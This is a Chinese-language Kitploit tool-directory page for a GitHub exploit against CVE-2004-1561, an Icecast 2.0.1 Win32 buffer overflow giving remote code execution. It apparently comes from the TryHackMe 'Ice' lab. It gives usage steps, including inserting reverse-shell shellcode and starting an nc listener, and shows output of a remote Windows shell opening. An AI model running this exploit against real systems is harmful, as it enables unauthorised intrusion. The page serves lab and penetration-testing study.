Skip to content
KitploitKITPLOIT
工具博客
提交
工具博客
提交

黑客、渗透测试和网络安全工具,武装您的安全武器库!

Kitploit 是一个黑客、网络安全和渗透测试工具的目录。发现最新的项目更新,查找漏洞、分析系统、自动化测试并加强你的安全。

··订阅源·联系·隐私·© 2026 Kitploit

工具目录

分类

查看所有分类
Loading categories
CVE-2004-1561 — Icecast Header Overwrite 缓冲区溢出远程代码执行 < 2.0.1 (Win32) | Kitploit
工具/GitHubGitHub/ivanitlearning/cve-2004-1561
Payload生成漏洞分析漏洞利用Shellcode渗透测试远程访问工具
GitHubivanitlearning/cve-2004-1561

CVE-2004-1561

Icecast Header Overwrite 缓冲区溢出远程代码执行 < 2.0.1 (Win32)

查看仓库
726年前尚未审核

最受欢迎

查看全部 →

发现我们社区最常用的工具。

探索所有工具

浏览我们的工具集合

查看所有工具 →
分享

CVE-2004-1561 Icecast 标头覆盖缓冲区溢出 RCE < 2.0.1 (Win32)

Python 3 Icecast 标头覆盖缓冲区溢出 RCE < 2.0.1 (Win32),根据此 Metasploit 模块 重写。我根据 Metasploit 模块重写了此漏洞利用,因为我无法让 此 exploit 工作。

使用方法:

将反向 shell shellcode 替换到 exploit 中,然后使用远程服务器和端口作为参数调用它。

root@kitploit:~
root@Kali:~/TryHackme/Ice# ./icecast.py 192.168.92.133 8000

完成!

反向 shell 监听器:

root@kitploit:~
root@Kali:~/TryHackme/Ice# nc -nlvp 443
listening on [any] 443 ...
connect to [192.168.92.128] from (UNKNOWN) [192.168.92.133] 49211
Microsoft Windows [版本 6.1.7601]
版权所有 (c) 2009 Microsoft Corporation。保留所有权利。

C:\Program Files (x86)\Icecast2 Win32>

更新 568-edit.c

成功使 原始 exploit 工作。根据 此内容 进行了编辑。

568-edit.c 的使用方法

root@kitploit:~
root@Kali:~/TryHackme/Ice# gcc 568-edit.c -o 568
root@Kali:~/TryHackme/Ice# ./568 192.168.92.133

Icecast <= 2.0.1 Win32 remote code execution 0.1
by Luigi Auriemma
e-mail: [email protected]
web:http://aluigi.altervista.org

shellcode add-on by Delikon
www.delikon.de

- target 192.168.92.133:8000
- send malformed data

Server IS vulnerable!!!

在监听器处

root@kitploit:~
root@Kali:~# nc -nlvp 443
listening on [any] 443 ...
connect to [192.168.92.128] from (UNKNOWN) [192.168.92.133] 49238
Microsoft Windows [版本 6.1.7601]
版权所有 (c) 2009 Microsoft Corporation。保留所有权利。

C:\Program Files (x86)\Icecast2 Win32>

下载工具